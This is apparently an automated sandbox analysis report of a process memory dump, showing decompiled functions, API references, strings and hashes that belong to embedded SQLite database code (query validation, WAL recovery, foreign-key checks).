Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 37057023eb2c2d052b53dc98877800496f6e1159b83bacac815626359101bd7f
Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
Opcode Fuzzy Hash: 37057023eb2c2d052b53dc98877800496f6e1159b83bacac815626359101bd7f
Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C

Uniqueness

Uniqueness Score: -1.00%

Function 00444E84, Relevance: 10.2, APIs: 8, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00444EBF
memcpy.MSVCRT ref: 00444F63
memcpy.MSVCRT ref: 00444F75
memcpy.MSVCRT ref: 00444F9D
memcpy.MSVCRT ref: 00444FAF
memcpy.MSVCRT ref: 00444FC1
memcpy.MSVCRT ref: 00445010
memset.MSVCRT ref: 0044505E

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memchrmemset
String ID:
API String ID: 1581201632-0
Opcode ID: e2f5ddc7defc8800a840d4fad05e0a868c00c300e6b5dc082c3421c5662b66c4
Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
Opcode Fuzzy Hash: e2f5ddc7defc8800a840d4fad05e0a868c00c300e6b5dc082c3421c5662b66c4
Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042ADCD, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0042ADCD(void* __fp0, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v19;
				char _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				void* _v84;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t108;
				intOrPtr* _t117;
				intOrPtr* _t119;
				signed int _t122;
				void* _t125;
				void* _t128;
				void* _t130;
				intOrPtr* _t140;
				signed int _t142;
				intOrPtr _t148;
				signed char _t151;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				void* _t166;
				intOrPtr* _t169;
				signed int _t170;
				void* _t172;
				void* _t178;

				_t178 = __fp0;
				_t172 = (_t170 & 0xfffffff8) - 0x54;
				_t140 = _a8;
				_t151 =  *(_t140 + 6) & 0x0000ffff;
				if((_t151 & 0x00000002) == 0) {
					_t108 = _a4;
					_t166 =  *((intOrPtr*)(_t108 + 8));
					_t142 =  *((intOrPtr*)(_t108 + 0xc));
					_t155 =  *_t166;
					_v72 = _t142;
					_v84 = _t166;
					_v68 = _t155;
					if((_t151 & 0x00000010) != 0) {
						_v60 = _t140;
						_v64 = 0 |  *((intOrPtr*)(_t140 + 0x1c)) != 0x00000000;
						while(1) {
							 *(_t140 + 6) =  *(_t140 + 6) | 0x00000002;
							memset( &_v40, 0, 0x24);
							_v40 = _t166;
							_t172 = _t172 + 0xc;
							_t167 =  &_v40;
							if(E0042B096( *((intOrPtr*)(_t140 + 0x28)),  &_v40) != 0 || E0042B096( *((intOrPtr*)(_t140 + 0x2c)),  &_v40) != 0) {
								goto L4;
							}
							_v20 = 1;
							_v36 =  *((intOrPtr*)(_t140 + 8));
							_v8 = _v72;
							_t117 =  *_t140;
							_t152 = 0;
							_v76 = _t117;
							_v88 = 0;
							if( *_t117 <= 0) {
								L15:
								_v88 = _t152;
								if( *((intOrPtr*)( *((intOrPtr*)(_t140 + 8)))) <= _t152) {
									L24:
									_t119 =  *((intOrPtr*)(_t140 + 0x10));
									_v76 = _t119;
									if(_t119 != _t152 || _v19 != 0) {
										 *(_t140 + 6) =  *(_t140 + 6) | 0x00000004;
									} else {
										_v20 = 0;
									}
									if( *((intOrPtr*)(_t140 + 0x14)) == _t152 || _t119 != _t152) {
										_v32 =  *_t140;
										if(E0042B096( *((intOrPtr*)(_t140 + 0xc)),  &_v40) != 0) {
											goto L4;
										} else {
											_t122 = E0042B096( *((intOrPtr*)(_t140 + 0x14)),  &_v40);
											if(_t122 != 0) {
												goto L4;
											} else {
												_v8 = _v8 & _t122;
												_v20 = 1;
												if(_v64 != _t122) {
													L34:
													_t160 = _v68;
													if( *((char*)(_t160 + 0x1e)) != 0) {
														goto L4;
													} else {
														_t169 = _v76;
														if(_t169 == 0) {
															L41:
															_t140 =  *((intOrPtr*)(_t140 + 0x1c));
															if(_t140 != 0) {
																_t166 = _v84;
																continue;
															} else {
																if(_v64 == _t140 || E0042AA6C(_t178, _v84, _v60) == 0) {
																	goto L44;
																} else {
																	goto L4;
																}
															}
														} else {
															_t125 = E0042AD03(_t152, _t178,  &_v40, _t140, _t169, "GROUP");
															_t172 = _t172 + 0x10;
															if(_t125 != 0 ||  *((intOrPtr*)(_t160 + 0x1e)) != _t125) {
																goto L4;
															} else {
																_t119 =  *((intOrPtr*)(_t169 + 0xc));
																_t167 =  *_t169;
																_t144 = 0;
																if(_t167 <= 0) {
																	goto L41;
																} else {
																	while(1) {
																		_t152 =  *_t119;
																		if(( *( *_t119 + 2) & 0x00000002) != 0) {
																			break;
																		}
																		_t144 = _t144 + 1;
																		_t119 = _t119 + 0x14;
																		if(_t144 < _t167) {
																			continue;
																		} else {
																			goto L41;
																		}
																		goto L45;
																	}
																	_push("aggregate functions are not allowed in the GROUP BY clause");
																	goto L47;
																}
															}
														}
													}
												} else {
													_t128 = E0042AD03(_t152, _t178,  &_v40, _t140,  *((intOrPtr*)(_t140 + 0x18)), "ORDER");
													_t172 = _t172 + 0x10;
													if(_t128 != 0) {
														goto L4;
													} else {
														goto L34;
													}
												}
											}
										}
									} else {
										_push("a GROUP BY clause is required before HAVING");
										L47:
										L004169A7(_t119, _t140, _t144, _t152, _v84, _t167, _t178);
										goto L4;
									}
								} else {
									_v80 = _t152;
									do {
										_t144 = _v80;
										_t130 =  *((intOrPtr*)(_t140 + 8)) + _v80 + 8;
										if( *((intOrPtr*)(_t130 + 0x10)) == _t152) {
											goto L23;
										} else {
											_t148 =  *((intOrPtr*)(_t130 + 4));
											_t167 = _v84;
											_t162 =  *((intOrPtr*)(_t167 + 0x200));
											if(_t148 != _t152) {
												 *((intOrPtr*)(_t167 + 0x200)) = _t148;
											}
											_v56 = E0042A7AE;
											_v52 = E0042ADCD;
											_v48 = _t167;
											_v44 = _v72;
											E0042A115( &_v56,  *((intOrPtr*)(_t130 + 0x10)));
											_pop(_t144);
											 *((intOrPtr*)(_t167 + 0x200)) = _t162;
											if( *((intOrPtr*)(_t167 + 0x40)) != 0 ||  *((char*)(_v68 + 0x1e)) != 0) {
												goto L4;
											} else {
												_t152 = 0;
												goto L23;
											}
										}
										goto L45;
										L23:
										_v88 = _v88 + 1;
										_v80 = _v80 + 0x38;
									} while (_v88 <  *((short*)( *((intOrPtr*)(_t140 + 8)))));
									goto L24;
								}
							} else {
								_v80 = 0;
								while(1) {
									_t167 =  &_v40;
									if(E0042B096( *((intOrPtr*)(_v80 +  *((intOrPtr*)(_t117 + 0xc)))),  &_v40) != 0) {
										goto L4;
									}
									_v88 = _v88 + 1;
									_t144 = _v88;
									_v80 = _v80 + 0x14;
									if(_v88 <  *_v76) {
										_t117 = _v76;
										continue;
									} else {
										_t152 = 0;
										goto L15;
									}
									goto L45;
								}
								goto L4;
							}
							goto L45;
						}
						goto L4;
					} else {
						0x43a6e7(_t166, _t140, _t142);
						if( *((intOrPtr*)(_t166 + 0x40)) != 0 ||  *((char*)(_t155 + 0x1e)) != 0) {
							L4:
							_push(2);
							_pop(1);
						} else {
							goto L44;
						}
					}
				}
				L45:
				return 1;
			}

0x0042adcd
0x0042add3
0x0042add7
0x0042adda
0x0042ade3
0x0042adec
0x0042adef
0x0042adf2
0x0042adf5
0x0042adf7
0x0042adfb
0x0042adff
0x0042ae03
0x0042ae2d
0x0042ae34
0x0042ae3e
0x0042ae3e
0x0042ae4c
0x0042ae51
0x0042ae58
0x0042ae5b
0x0042ae66
0x00000000
0x00000000
0x0042ae74
0x0042ae7c
0x0042ae84
0x0042ae88
0x0042ae8a
0x0042ae8e
0x0042ae92
0x0042ae96
0x0042aed4
0x0042aeda
0x0042aede
0x0042af73
0x0042af73
0x0042af78
0x0042af7c
0x0042af8c
0x0042af85
0x0042af85
0x0042af85
0x0042af94
0x0042afa0
0x0042afb2
0x00000000
0x0042afb8
0x0042afbb
0x0042afc2
0x00000000
0x0042afc8
0x0042afc8
0x0042afd0
0x0042afd5
0x0042aff3
0x0042aff3
0x0042affb
0x00000000
0x0042b001
0x0042b001
0x0042b007
0x0042b049
0x0042b049
0x0042b04e
0x0042ae3a
0x00000000
0x0042b054
0x0042b058
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b058
0x0042b009
0x0042b015
0x0042b01a
0x0042b01f
0x00000000
0x0042b02e
0x0042b02e
0x0042b031
0x0042b033
0x0042b037
0x00000000
0x0042b039
0x0042b039
0x0042b039
0x0042b03f
0x00000000
0x00000000
0x0042b041
0x0042b042
0x0042b047
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b047
0x0042b08f
0x00000000
0x0042b08f
0x0042b037
0x0042b01f
0x0042b007
0x0042afd7
0x0042afe3
0x0042afe8
0x0042afed
0x00000000
0x00000000
0x00000000
0x00000000
0x0042afed
0x0042afd5
0x0042afc2
0x0042b07b
0x0042b07b
0x0042b080
0x0042b084
0x00000000
0x0042b089
0x0042aee4
0x0042aee4
0x0042aee8
0x0042aeeb
0x0042aeef
0x0042aef6
0x00000000
0x0042aef8
0x0042aef8
0x0042aefd
0x0042af01
0x0042af07
0x0042af09
0x0042af09
0x0042af1b
0x0042af23
0x0042af2b
0x0042af2f
0x0042af33
0x0042af3d
0x0042af3e
0x0042af44
0x00000000
0x0042af58
0x0042af58
0x00000000
0x0042af58
0x0042af44
0x00000000
0x0042af5a
0x0042af60
0x0042af64
0x0042af69
0x00000000
0x0042aee8
0x0042ae98
0x0042ae98
0x0042aea2
0x0042aeac
0x0042aeb7
0x00000000
0x00000000
0x0042aebd
0x0042aec5
0x0042aec9
0x0042aed0
0x0042ae9e
0x00000000
0x0042aed2
0x0042aed2
0x00000000
0x0042aed2
0x00000000
0x0042aed0
0x00000000
0x0042aea2
0x00000000
0x0042ae96
0x00000000
0x0042ae05
0x0042ae08
0x0042ae14
0x0042ae20
0x0042ae20
0x0042ae22
0x00000000
0x00000000
0x00000000
0x0042ae14
0x0042ae03
0x0042b074
0x0042b07a

APIs

memset.MSVCRT ref: 0042AE4C

Strings

GROUP, xrefs: 0042B009
a GROUP BY clause is required before HAVING, xrefs: 0042B07B
ORDER, xrefs: 0042AFD7
8, xrefs: 0042AF64
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042B08F

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: 156a67ad1e46cd236d3515c6a1d71bde0d08be0399c066307d6f622e21838c44
Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
Opcode Fuzzy Hash: 156a67ad1e46cd236d3515c6a1d71bde0d08be0399c066307d6f622e21838c44
Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00435A61, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON

Download Yara Rule

Strings

foreign key constraint failed, xrefs: 00435D01
oid, xrefs: 00435B2B
old, xrefs: 00435AE5
new, xrefs: 00435AEF

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: a8e501845e4299dbab340952c406beb3f74a2bf5e14d4fb9f8bab46e1a432e43
Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
Opcode Fuzzy Hash: a8e501845e4299dbab340952c406beb3f74a2bf5e14d4fb9f8bab46e1a432e43
Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE6B, Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 250
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041CE6B(void* __eax, void* __fp0) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				int _v60;
				signed int _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void _v84;
				void* _v88;
				void* _v92;
				void* _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t95;
				signed int _t97;
				intOrPtr* _t100;
				signed int _t101;
				intOrPtr* _t109;
				intOrPtr* _t110;
				signed int _t111;
				intOrPtr* _t113;
				signed int _t114;
				signed int _t118;
				signed int _t133;
				signed int _t148;
				signed int _t151;
				signed char _t154;
				void* _t156;
				void* _t165;
				void* _t173;
				intOrPtr _t175;
				void* _t176;
				intOrPtr _t179;
				signed int _t185;
				int _t187;
				void* _t189;
				void* _t190;
				void* _t191;
				intOrPtr _t195;
				void* _t209;

				_t209 = __fp0;
				_t189 = __eax;
				_t187 = 0;
				_t95 = ( *(__eax + 0x20) & 0x000000ff) + 1;
				_t156 = 8;
				_v32 = _t95;
				_v60 = 0;
				_v56 = 0;
				_v28 = _t156 - _t95;
				_t97 = E0041CCA7(__eax, _t95, _t156 - _t95);
				if(_t97 != 0) {
					L36:
					return _t97;
				}
				memset(_t189 + 0x24, 0, 0x30);
				_t100 =  *((intOrPtr*)(_t189 + 8));
				_t191 = _t190 + 0xc;
				_t101 =  *((intOrPtr*)( *_t100 + 0x18))(_t100,  &_v52);
				_v8 = _t101;
				if(_t101 != 0) {
					L35:
					E0041CCC7(_t189, _v32, _v28);
					_t97 = _v8;
					goto L36;
				}
				_t195 = _v48;
				if(_t195 < 0 || _t195 <= 0 && _v52 <= 0x20) {
					L31:
					 *(_t189 + 0x3c) = _v60;
					 *((intOrPtr*)(_t189 + 0x40)) = _v56;
					E0041CB26(_t189);
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t189 + 0x14)))) + 0x60;
					 *_t109 = _t187;
					 *((intOrPtr*)(_t109 + 4)) = _t187;
					_t110 = _t109 + 8;
					_t165 = 4;
					do {
						 *_t110 = 0xffffffff;
						_t110 = _t110 + 4;
						_t165 = _t165 - 1;
					} while (_t165 != 0);
					_t111 =  *(_t189 + 0x38);
					if(_t111 != _t187) {
						_push( *((intOrPtr*)(_t189 + 0x54)));
						_push(_t111);
						_push("Recovered %d frames from WAL file %s");
						_push(_t187);
						L00416760(_t111, _t154, _t187, _t189);
					}
					goto L35;
				} else {
					_t113 =  *((intOrPtr*)(_t189 + 8));
					_t166 =  *_t113;
					_t114 =  *((intOrPtr*)( *_t113 + 8))(_t113,  &_v100, 0x20, _t187, _t187);
					_t191 = _t191 + 0x14;
					_v8 = _t114;
					if(_t114 != _t187) {
						goto L35;
					}
					_t154 = L00416F90(_t166, _t187, _t189, _t209);
					_t118 = L00416F90(_t166, _t187, _t189, _t209);
					_v12 = _t118;
					if((_t154 & 0xfffffffe) != 0x377f0682) {
						goto L31;
					}
					_t20 = _t118 - 1; // -1
					if((_t118 & _t20) != 0) {
						goto L31;
					}
					_t23 = _t118 - 0x200; // -512
					_t170 = _t23;
					if(_t23 > 0xfe00) {
						goto L31;
					}
					 *(_t189 + 0x18) = _t118;
					 *(_t189 + 0x31) = _t154 & 0x00000001;
					 *((intOrPtr*)(_t189 + 0x58)) = L00416F90(_t170, _t187, _t189, _t209);
					memcpy(_t189 + 0x44,  &_v84, 8);
					_t191 = _t191 + 0xc;
					_t154 = _t189 + 0x3c;
					_push(_t154);
					_push(0 |  *(_t189 + 0x31) == 0x00000000);
					_t185 = 0x18;
					E0041CA6A( &_v100, 0, _t185);
					_pop(_t173);
					if( *_t154 != L00416F90(_t173, _t187, _t189, _t209) ||  *((intOrPtr*)(_t189 + 0x40)) != L00416F90(_t173, _t187, _t189, _t209)) {
						goto L31;
					} else {
						_t133 = L00416F90(_t173, _t187, _t189, _t209);
						if(_t133 == 0x2de218) {
							_push(_v12 + 0x18);
							_t154 = E00415700(_v12 + 0x18, _t185, _t187);
							__eflags = _t154 - _t187;
							if(_t154 != _t187) {
								asm("cdq");
								_t175 = _v12 + 0x18;
								_t139 = _t185;
								_v68 = _t175;
								_t176 = _t175 + 0x20;
								_v64 = _t139;
								asm("adc eax, edi");
								__eflags = _t139 - _v48;
								_v16 = _t187;
								_v44 = 0x20;
								_v40 = _t187;
								if(__eflags > 0) {
									L29:
									_push(_t154);
									E0041589B(_t139, _t154, _t176, _t185, _t187, _t209);
									L30:
									if(_v8 != _t187) {
										goto L35;
									}
									goto L31;
								}
								if(__eflags < 0) {
									while(1) {
										L20:
										_push(_v40);
										_push(_v44);
										_push(_v12 + 0x18);
										_push(_t154);
										_t139 = L0041519D( *((intOrPtr*)(_t189 + 8)), _t154, _t176, _t185, _t187, _t189, __eflags);
										_t191 = _t191 + 0x10;
										__eflags = _t139 - _t187;
										_v8 = _t139;
										if(_t139 != _t187) {
											goto L29;
										}
										_t55 = _t154 + 0x18; // 0x18
										_t139 = E0041CBDC(_t154, _t176, _t185, _t189, _t209,  &_v20,  &_v24, _t55);
										_t191 = _t191 + 0xc;
										__eflags = _t139;
										if(__eflags == 0) {
											L28:
											_t187 = 0;
											__eflags = 0;
											goto L29;
										}
										_v16 = _v16 + 1;
										_t139 = E0041CDB4(_v16, _t185, __eflags, _t189, _v20);
										__eflags = _t139;
										_pop(_t176);
										_v8 = _t139;
										if(_t139 != 0) {
											goto L28;
										}
										_t148 = _v24;
										__eflags = _t148;
										if(_t148 != 0) {
											 *(_t189 + 0x38) = _t148;
											 *((intOrPtr*)(_t189 + 0x34)) = _v16;
											_t151 = _v12 >> 0x00000010 | _v12 & 0xffffff00;
											__eflags = _t151;
											 *(_t189 + 0x32) = _t151;
											_v60 =  *(_t189 + 0x3c);
											_v56 =  *((intOrPtr*)(_t189 + 0x40));
										}
										_t179 = _v68;
										_v44 = _v44 + _t179;
										_t139 = _v64;
										asm("adc [ebp-0x24], eax");
										_t176 = _t179 + _v44;
										asm("adc eax, [ebp-0x24]");
										__eflags = _v64 - _v48;
										if(__eflags < 0) {
											L19:
											_t187 = 0;
											__eflags = 0;
											continue;
										} else {
											if(__eflags > 0) {
												goto L28;
											}
											__eflags = _t176 - _v52;
											if(_t176 <= _v52) {
												goto L19;
											}
											goto L28;
										}
									}
									goto L29;
								}
								__eflags = _t176 - _v52;
								if(__eflags > 0) {
									goto L29;
								}
								goto L20;
							}
							_v8 = 7;
							goto L35;
						}
						0x444706(0xa769);
						_v8 = _t133;
						goto L30;
					}
				}
			}

0x0041ce6b
0x0041ce73
0x0041ce7c
0x0041ce7e
0x0041ce7f
0x0041ce83
0x0041ce89
0x0041ce8c
0x0041ce8f
0x0041ce92
0x0041ce9b
0x0041d133
0x0041d137
0x0041d137
0x0041cea8
0x0041cead
0x0041ceb2
0x0041ceba
0x0041cec1
0x0041cec4
0x0041d121
0x0041d129
0x0041d12e
0x00000000
0x0041d132
0x0041ceca
0x0041cecd
0x0041d0d8
0x0041d0db
0x0041d0e1
0x0041d0e4
0x0041d0ee
0x0041d0f1
0x0041d0f5
0x0041d0f8
0x0041d0fb
0x0041d0fc
0x0041d0fc
0x0041d102
0x0041d105
0x0041d105
0x0041d108
0x0041d10d
0x0041d10f
0x0041d112
0x0041d113
0x0041d118
0x0041d119
0x0041d11e
0x00000000
0x0041cedf
0x0041cedf
0x0041cee2
0x0041ceed
0x0041cef0
0x0041cef5
0x0041cef8
0x00000000
0x00000000
0x0041cf06
0x0041cf0b
0x0041cf1b
0x0041cf1e
0x00000000
0x00000000
0x0041cf24
0x0041cf29
0x00000000
0x00000000
0x0041cf2f
0x0041cf2f
0x0041cf3b
0x00000000
0x00000000
0x0041cf41
0x0041cf4a
0x0041cf52
0x0041cf5f
0x0041cf66
0x0041cf6c
0x0041cf72
0x0041cf75
0x0041cf78
0x0041cf7c
0x0041cf82
0x0041cf8d
0x00000000
0x0041cfa4
0x0041cfa7
0x0041cfb1
0x0041cfcb
0x0041cfd1
0x0041cfd3
0x0041cfd6
0x0041cfea
0x0041cfeb
0x0041cfed
0x0041cfef
0x0041cff2
0x0041cff5
0x0041cff8
0x0041cffa
0x0041cffd
0x0041d000
0x0041d007
0x0041d00a
0x0041d0cc
0x0041d0cc
0x0041d0cd
0x0041d0d2
0x0041d0d6
0x00000000
0x00000000
0x00000000
0x0041d0d6
0x0041d010
0x0041d01f
0x0041d01f
0x0041d01f
0x0041d025
0x0041d02b
0x0041d02f
0x0041d030
0x0041d035
0x0041d038
0x0041d03a
0x0041d03d
0x00000000
0x00000000
0x0041d043
0x0041d04f
0x0041d054
0x0041d057
0x0041d059
0x0041d0ca
0x0041d0ca
0x0041d0ca
0x00000000
0x0041d0ca
0x0041d05e
0x0041d065
0x0041d06a
0x0041d06d
0x0041d06e
0x0041d071
0x00000000
0x00000000
0x0041d073
0x0041d076
0x0041d078
0x0041d07d
0x0041d083
0x0041d092
0x0041d092
0x0041d094
0x0041d09b
0x0041d0a1
0x0041d0a1
0x0041d0a4
0x0041d0a7
0x0041d0aa
0x0041d0ad
0x0041d0b0
0x0041d0b3
0x0041d0b6
0x0041d0b9
0x0041d01d
0x0041d01d
0x0041d01d
0x00000000
0x0041d0bf
0x0041d0bf
0x00000000
0x00000000
0x0041d0c1
0x0041d0c4
0x00000000
0x00000000
0x00000000
0x0041d0c4
0x0041d0b9
0x00000000
0x0041d01f
0x0041d012
0x0041d015
0x00000000
0x00000000
0x00000000
0x0041d01b
0x0041cfd8
0x00000000
0x0041cfd8
0x0041cfb8
0x0041cfbd
0x00000000
0x0041cfbd
0x0041cf8d

APIs

memset.MSVCRT ref: 0041CEA8
memcpy.MSVCRT ref: 0041CF5F

Strings

, xrefs: 0041D000
, xrefs: 0041CED5
Recovered %d frames from WAL file %s, xrefs: 0041D113

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset
String ID: $ $Recovered %d frames from WAL file %s
API String ID: 1297977491-1630138656
Opcode ID: 57facf784904788ddab9ef641f9aafa3a63a7e91ddfdef88d0b5b0e13235a160
Instruction ID: dd370354891757046673aa32522c262bffeb2df4653dbb6adf89a6bddf31d64f
Opcode Fuzzy Hash: 57facf784904788ddab9ef641f9aafa3a63a7e91ddfdef88d0b5b0e13235a160
Instruction Fuzzy Hash: 02914DB1D00208AFDB14DFA9D8819EEBBF4EF48318F14442FE505E7241E739AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00431671, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00431771
memcpy.MSVCRT ref: 00431888

Strings

unknown column "%s" in foreign key definition, xrefs: 00431858
foreign key on %s should reference only one column of table %T, xrefs: 004316CD
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: 952c109232d027e2837d50ca9d9dd3a6ac747b8f2da8014d8ccf7f636f1923b8
Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
Opcode Fuzzy Hash: 952c109232d027e2837d50ca9d9dd3a6ac747b8f2da8014d8ccf7f636f1923b8
Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1A5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041F1A5(intOrPtr* __ebx, void* __ecx, void* __edx, void* __fp0) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t75;
				intOrPtr _t79;
				short _t88;
				signed int _t96;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t111;
				intOrPtr _t114;
				intOrPtr* _t115;
				void* _t116;
				void* _t118;
				signed int _t122;
				signed int _t134;
				signed int _t136;
				intOrPtr _t141;
				signed int _t142;
				intOrPtr _t143;
				signed int _t145;
				void* _t147;
				void* _t148;
				void* _t158;

				_t163 = __fp0;
				_t126 = __edx;
				_t116 = __ecx;
				_t115 = __ebx;
				_t75 = E0041BC3B(__edx,  *__ebx, __fp0);
				_t151 = _t75;
				if(_t75 == 0) {
					_t75 = E0041EDAD(_t116, __edx, 1, __ebx, _t151,  &_v8, _t75);
					_pop(_t118);
					if(_t75 == 0) {
						_t134 = _v8;
						_t79 = L00416F90(_t118, _t134, __ebx, __fp0);
						_t119 =  *_t115;
						_t141 =  *((intOrPtr*)( *_t115 + 0x18));
						_v28 = _t79;
						_v16 = _t79;
						_v24 = _t141;
						if(_t79 == 0) {
							L4:
							_v16 = _t141;
							L5:
							if(_v16 <= 0) {
								L27:
								_t142 =  *((intOrPtr*)(_t115 + 0x24)) - 0xc;
								 *((short*)(_t115 + 0x18)) = (_t142 << 6) / 0xff - 0x17;
								_t88 = (_t142 << 5) / 0xff + 0xffffffe9;
								 *((short*)(_t115 + 0x1a)) = _t88;
								 *((short*)(_t115 + 0x1e)) = _t88;
								 *(_t115 + 0xc) = _v8;
								_t122 =  *((intOrPtr*)(_t115 + 0x24)) - 0x23;
								__eflags = _t122;
								 *(_t115 + 0x1c) = _t122;
								 *((intOrPtr*)(_t115 + 0x2c)) = _v16;
								L28:
								return 0;
							}
							_t143 =  *((intOrPtr*)(_t134 + 0x40));
							_v12 = 0x1a;
							0x446658(_t143, "SQLite format 3", 0x10);
							if(_t79 != 0) {
								L24:
								E0041EE6B(_v8);
								 *(_t115 + 0xc) =  *(_t115 + 0xc) & 0x00000000;
								return _v12;
							}
							if( *((char*)(_t143 + 0x12)) > 2) {
								 *((char*)(_t115 + 0x10)) = 1;
							}
							_t158 =  *((intOrPtr*)(_t143 + 0x13)) - 2;
							if(_t158 > 0) {
								goto L24;
							} else {
								if(_t158 != 0 ||  *((char*)(_t115 + 0x16)) != 0) {
									L16:
									_t96 = _t143 + 0x15;
									0x446658(_t96, "@  ", 3);
									__eflags = _t96;
									if(_t96 != 0) {
										goto L24;
									}
									_t136 =  *(_t143 + 0x10) << 8;
									_t28 = _t136 - 1; // -1
									_t100 = _t28;
									__eflags = _t136 & _t100;
									if((_t136 & _t100) != 0) {
										goto L24;
									}
									_t31 = _t136 - 0x101; // -257
									__eflags = _t31 - 0xfeff;
									if(_t31 > 0xfeff) {
										goto L24;
									}
									_t145 = _t136 - ( *(_t143 + 0x14) & 0x000000ff);
									__eflags = _t136 -  *(_t115 + 0x20);
									_v20 = _t145;
									if(_t136 ==  *(_t115 + 0x20)) {
										_t103 =  *((intOrPtr*)(_t115 + 4));
